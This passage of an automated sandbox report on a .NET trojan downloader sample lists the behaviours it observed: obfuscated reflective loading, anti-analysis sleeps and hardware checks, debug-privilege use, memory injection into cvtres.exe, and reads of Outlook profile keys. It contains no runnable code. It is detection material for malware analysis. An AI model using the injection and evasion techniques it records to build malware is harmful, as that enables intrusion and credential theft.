                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A5992A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A59938
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A55688
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A57201
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A51271
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A55E70
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A55678
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A593A4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A54FA8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A54F98
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A593F4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A58BF0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A587C9
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A59710
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A50368
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00B52020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00B5CD18
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00B52D50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00B52618
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00B5AB70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00B5F420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_069647A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_06964790
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09EC7120
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09EC90D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09EC6850
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_09EC6508
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000000.230636214.0000000000212000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameQIYUIEHDKHDFKDF.exe@ vs SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245453721.000000000273D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamejMwFIuasQmBRssQfxHWfZPad.exe4 vs SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.244435933.000000000082B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.246693047.0000000007DD0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameWHGDFHKDLHDJD.dll< vs SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.244843547.0000000000BE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245594271.0000000003D89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamejMwFIuasQmBRssQfxHWfZPad.exe4 vs SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.244878881.0000000002589000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000000.230581294.0000000000202000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245345627.000000000271A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWHGDFHKDLHDJD.dll< vs SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeBinary or memory string: OriginalFilenameResourceAssembly.dllD vs SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeBinary or memory string: OriginalFilenameQIYUIEHDKHDFKDF.exe@ vs SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeStatic PE information: invalid certificate
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe.logJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@2/2
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: 3.0.cvtres.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 3.0.cvtres.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 3.0.cvtres.exe.400000.3.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 3.0.cvtres.exe.400000.3.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 3.2.cvtres.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 3.2.cvtres.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\WHGDFHKDLHDJD.pdb source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.246693047.0000000007DD0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245345627.000000000271A000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\WHGDFHKDLHDJD.pdbBSJB source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.246693047.0000000007DD0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.245345627.000000000271A000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: QIYUIEHDKHDFKDF.pdb source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe
                Source: Binary string: QIYUIEHDKHDFKDF.pdb$ source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe

                Data Obfuscation

                barindex
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, u202b????????????????????????????????????????.cs.Net Code: ???????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 0.0.SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe.200000.0.unpack, u202b????????????????????????????????????????.cs.Net Code: ???????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeCode function: 0_2_00A561EB push ecx; iretd
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00B57A37 push edi; retn 0000h
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_06968F69 push ebx; retf
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_06966B1F push ebx; retf
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_069669B5 push ebp; retf
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_06967E40 push edx; retf
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_06967961 push es; ret
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeStatic PE information: real checksum: 0x4685f should be: 0x4a718
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe TID: 2912Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe TID: 6080Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 5752Thread sleep time: -18446744073709540s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 3452Thread sleep count: 9849 > 30
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWindow / User API: threadDelayed 9849
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 922337203685477
                Source: SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe, 00000000.00000002.244534464.000000000087F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
                Source: cvtres.exe, 00000003.00000002.506578244.0000000009CC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeProcess token adjusted: Debug
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess token adjusted: Debug
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00B5E1B0 LdrInitializeThunk,
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 402000
